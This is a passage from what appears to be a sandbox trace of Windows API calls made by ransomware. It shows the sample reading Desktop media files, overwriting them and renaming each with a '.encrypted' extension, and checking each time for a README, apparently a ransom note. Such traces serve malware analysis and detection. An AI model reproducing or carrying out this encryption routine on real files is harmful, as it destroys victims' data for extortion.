nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png", lpFilePart=0x0) returned 0x31 [0153.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ma8f_cd.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.572] GetFileType (hFile=0x4d0) returned 0x1 [0153.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.572] GetFileType (hFile=0x4d0) returned 0x1 [0153.572] WriteFile (in: hFile=0x4d0, lpBuffer=0x228d7dc*, nNumberOfBytesToWrite=0x1b90, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x228d7dc*, lpNumberOfBytesWritten=0x2ee884*=0x1b90, lpOverlapped=0x0) returned 1 [0153.573] CloseHandle (hObject=0x4d0) returned 1 [0153.574] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png", lpFilePart=0x0) returned 0x31 [0153.574] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png.encrypted", lpFilePart=0x0) returned 0x3b [0153.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.574] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ma8f_cd.png"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b360910, ftCreationTime.dwHighDateTime=0x1d5e6ff, ftLastAccessTime.dwLowDateTime=0x4d7faa80, ftLastAccessTime.dwHighDateTime=0x1d5d885, ftLastWriteTime.dwLowDateTime=0x4281e420, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1b90)) returned 1 [0153.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.574] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ma8f_cd.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ma8f_cd.png.encrypted")) returned 1 [0153.576] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png", lpFilePart=0x0) returned 0x3d [0153.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rwk-erfykvs1uby43p5.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.576] GetFileType (hFile=0x4d0) returned 0x1 [0153.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.576] GetFileType (hFile=0x4d0) returned 0x1 [0153.576] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1231d [0153.576] ReadFile (in: hFile=0x4d0, lpBuffer=0x228f878, nNumberOfBytesToRead=0x1231d, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x228f878*, lpNumberOfBytesRead=0x2ee894*=0x1231d, lpOverlapped=0x0) returned 1 [0153.577] CloseHandle (hObject=0x4d0) returned 1 [0153.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png", lpFilePart=0x0) returned 0x3d [0153.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rwk-erfykvs1uby43p5.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.610] GetFileType (hFile=0x4d0) returned 0x1 [0153.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.610] GetFileType (hFile=0x4d0) returned 0x1 [0153.610] WriteFile (in: hFile=0x4d0, lpBuffer=0x23130f8*, nNumberOfBytesToWrite=0x12320, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x23130f8*, lpNumberOfBytesWritten=0x2ee884*=0x12320, lpOverlapped=0x0) returned 1 [0153.612] CloseHandle (hObject=0x4d0) returned 1 [0153.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png", lpFilePart=0x0) returned 0x3d [0153.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png.encrypted", lpFilePart=0x0) returned 0x47 [0153.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rwk-erfykvs1uby43p5.png"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849947a0, ftCreationTime.dwHighDateTime=0x1d5e295, ftLastAccessTime.dwLowDateTime=0xd9c9c850, ftLastAccessTime.dwHighDateTime=0x1d5de1f, ftLastWriteTime.dwLowDateTime=0x4286a6e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x12320)) returned 1 [0153.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.614] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rwk-erfykvs1uby43p5.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RWK-ERfyKVS1ubY43p5.png.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rwk-erfykvs1uby43p5.png.encrypted")) returned 1 [0153.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi", lpFilePart=0x0) returned 0x31 [0153.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryds5gi.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.615] GetFileType (hFile=0x4d0) returned 0x1 [0153.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.615] GetFileType (hFile=0x4d0) returned 0x1 [0153.615] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x11041 [0153.616] ReadFile (in: hFile=0x4d0, lpBuffer=0x232593c, nNumberOfBytesToRead=0x11041, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x232593c*, lpNumberOfBytesRead=0x2ee894*=0x11041, lpOverlapped=0x0) returned 1 [0153.617] CloseHandle (hObject=0x4d0) returned 1 [0153.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.632] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi", lpFilePart=0x0) returned 0x31 [0153.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryds5gi.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.634] GetFileType (hFile=0x4d0) returned 0x1 [0153.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.634] GetFileType (hFile=0x4d0) returned 0x1 [0153.634] WriteFile (in: hFile=0x4d0, lpBuffer=0x23a57f0*, nNumberOfBytesToWrite=0x11050, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x23a57f0*, lpNumberOfBytesWritten=0x2ee884*=0x11050, lpOverlapped=0x0) returned 1 [0153.636] CloseHandle (hObject=0x4d0) returned 1 [0153.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi", lpFilePart=0x0) returned 0x31 [0153.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi.encrypted", lpFilePart=0x0) returned 0x3b [0153.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.638] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryds5gi.avi"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f8d8d0, ftCreationTime.dwHighDateTime=0x1d5e31f, ftLastAccessTime.dwLowDateTime=0x7010350, ftLastAccessTime.dwHighDateTime=0x1d5dd40, ftLastWriteTime.dwLowDateTime=0x428b69a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x11050)) returned 1 [0153.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.638] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryds5gi.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RYDs5gi.avi.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryds5gi.avi.encrypted")) returned 1 [0153.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv", lpFilePart=0x0) returned 0x39 [0153.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjcawpc7bdkozku.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.640] GetFileType (hFile=0x4d0) returned 0x1 [0153.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.640] GetFileType (hFile=0x4d0) returned 0x1 [0153.640] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xb12b [0153.640] ReadFile (in: hFile=0x4d0, lpBuffer=0x23b6d24, nNumberOfBytesToRead=0xb12b, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23b6d24*, lpNumberOfBytesRead=0x2ee894*=0xb12b, lpOverlapped=0x0) returned 1 [0153.643] CloseHandle (hObject=0x4d0) returned 1 [0153.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv", lpFilePart=0x0) returned 0x39 [0153.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjcawpc7bdkozku.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.659] GetFileType (hFile=0x4d0) returned 0x1 [0153.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.659] GetFileType (hFile=0x4d0) returned 0x1 [0153.659] WriteFile (in: hFile=0x4d0, lpBuffer=0x2424e78*, nNumberOfBytesToWrite=0xb130, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2424e78*, lpNumberOfBytesWritten=0x2ee884*=0xb130, lpOverlapped=0x0) returned 1 [0153.660] CloseHandle (hObject=0x4d0) returned 1 [0153.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv", lpFilePart=0x0) returned 0x39 [0153.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv.encrypted", lpFilePart=0x0) returned 0x43 [0153.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.662] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjcawpc7bdkozku.mkv"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c8bf50, ftCreationTime.dwHighDateTime=0x1d5e06e, ftLastAccessTime.dwLowDateTime=0x73732b0, ftLastAccessTime.dwHighDateTime=0x1d5d857, ftLastWriteTime.dwLowDateTime=0x428dcb00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xb130)) returned 1 [0153.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.662] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjcawpc7bdkozku.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjCawpC7bDKOzKu.mkv.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjcawpc7bdkozku.mkv.encrypted")) returned 1 [0153.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3", lpFilePart=0x0) returned 0x34 [0153.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uk2dexxon2.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.664] GetFileType (hFile=0x4d0) returned 0x1 [0153.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.664] GetFileType (hFile=0x4d0) returned 0x1 [0153.664] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x10ad0 [0153.664] ReadFile (in: hFile=0x4d0, lpBuffer=0x24304cc, nNumberOfBytesToRead=0x10ad0, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x24304cc*, lpNumberOfBytesRead=0x2ee894*=0x10ad0, lpOverlapped=0x0) returned 1 [0153.665] CloseHandle (hObject=0x4d0) returned 1 [0153.712] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.712] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3", lpFilePart=0x0) returned 0x34 [0153.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uk2dexxon2.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.714] GetFileType (hFile=0x4d0) returned 0x1 [0153.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.714] GetFileType (hFile=0x4d0) returned 0x1 [0153.714] WriteFile (in: hFile=0x4d0, lpBuffer=0x22be310*, nNumberOfBytesToWrite=0x10ae0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22be310*, lpNumberOfBytesWritten=0x2ee884*=0x10ae0, lpOverlapped=0x0) returned 1 [0153.717] CloseHandle (hObject=0x4d0) returned 1 [0153.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3", lpFilePart=0x0) returned 0x34 [0153.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3.encrypted", lpFilePart=0x0) returned 0x3e [0153.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uk2dexxon2.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a5a4020, ftCreationTime.dwHighDateTime=0x1d5dd91, ftLastAccessTime.dwLowDateTime=0x576fd890, ftLastAccessTime.dwHighDateTime=0x1d5e644, ftLastWriteTime.dwLowDateTime=0x42975080, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x10ae0)) returned 1 [0153.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.719] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uk2dexxon2.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uk2deXxOn2.mp3.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uk2dexxon2.mp3.encrypted")) returned 1 [0153.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi", lpFilePart=0x0) returned 0x3d 